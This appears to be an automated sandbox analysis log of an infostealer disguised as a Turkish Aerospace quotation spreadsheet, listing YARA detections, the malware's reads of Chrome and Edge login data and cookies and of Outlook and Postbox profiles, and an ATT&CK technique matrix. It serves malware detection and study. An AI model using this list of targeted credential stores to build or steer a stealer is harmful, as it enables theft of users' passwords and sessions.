                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeQueries volume information: C:\Users\user\AppData\Roaming\WheTgQY.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeQueries volume information: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeQueries volume information: C:\Users\user\AppData\Roaming\WheTgQY.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 00000010.00000002.4483172378.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.4491033663.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.4491137274.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.WheTgQY.exe.411c3d0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.WheTgQY.exe.415f3f0.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.WheTgQY.exe.415f3f0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.WheTgQY.exe.411c3d0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000009.00000002.2077441641.000000000411C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2036673189.00000000043DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe PID: 3948, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: WheTgQY.exe PID: 5456, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe PID: 6404, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: WheTgQY.exe PID: 7400, type: MEMORYSTR
                  Source: Yara matchFile source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.WheTgQY.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.WheTgQY.exe.411c3d0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.WheTgQY.exe.415f3f0.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.WheTgQY.exe.415f3f0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.WheTgQY.exe.411c3d0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000010.00000002.4483172378.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.4483176808.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.2077441641.000000000411C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2036673189.00000000043DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe PID: 3948, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: WheTgQY.exe PID: 5456, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: WheTgQY.exe PID: 7400, type: MEMORYSTR
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: Yara matchFile source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.WheTgQY.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.WheTgQY.exe.411c3d0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.WheTgQY.exe.415f3f0.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.WheTgQY.exe.415f3f0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.WheTgQY.exe.411c3d0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000010.00000002.4483172378.000000000043D000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.4491033663.00000000028FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.4491137274.0000000002B5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.2077441641.000000000411C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2036673189.00000000043DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe PID: 3948, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: WheTgQY.exe PID: 5456, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe PID: 6404, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: WheTgQY.exe PID: 7400, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 00000010.00000002.4483172378.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.4491033663.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.4491137274.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.WheTgQY.exe.411c3d0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.WheTgQY.exe.415f3f0.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.WheTgQY.exe.415f3f0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.WheTgQY.exe.411c3d0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000009.00000002.2077441641.000000000411C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2036673189.00000000043DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe PID: 3948, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: WheTgQY.exe PID: 5456, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe PID: 6404, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: WheTgQY.exe PID: 7400, type: MEMORYSTR
                  Source: Yara matchFile source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.WheTgQY.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.WheTgQY.exe.411c3d0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.WheTgQY.exe.415f3f0.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.WheTgQY.exe.415f3f0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.WheTgQY.exe.411c3d0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000010.00000002.4483172378.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.4483176808.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.2077441641.000000000411C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2036673189.00000000043DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe PID: 3948, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: WheTgQY.exe PID: 5456, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: WheTgQY.exe PID: 7400, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Native API
                  1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  11
                  Disable or Modify Tools
                  1
                  OS Credential Dumping
                  1
                  File and Directory Discovery
                  Remote Services11
                  Archive Collected Data
                  1
                  Web Service
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Scheduled Task/Job
                  1
                  Scheduled Task/Job
                  111
                  Process Injection
                  1
                  Deobfuscate/Decode Files or Information
                  1
                  Input Capture
                  13
                  System Information Discovery
                  Remote Desktop Protocol1
                  Data from Local System
                  3
                  Ingress Tool Transfer
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                  Scheduled Task/Job
                  3
                  Obfuscated Files or Information
                  Security Account Manager1
                  Query Registry
                  SMB/Windows Admin Shares1
                  Screen Capture
                  11
                  Encrypted Channel
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                  Software Packing
                  NTDS11
                  Security Software Discovery
                  Distributed Component Object Model1
                  Email Collection
                  3
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Timestomp
                  LSA Secrets1
                  Process Discovery
                  SSH1
                  Input Capture
                  14
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading
                  Cached Domain Credentials31
                  Virtualization/Sandbox Evasion
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
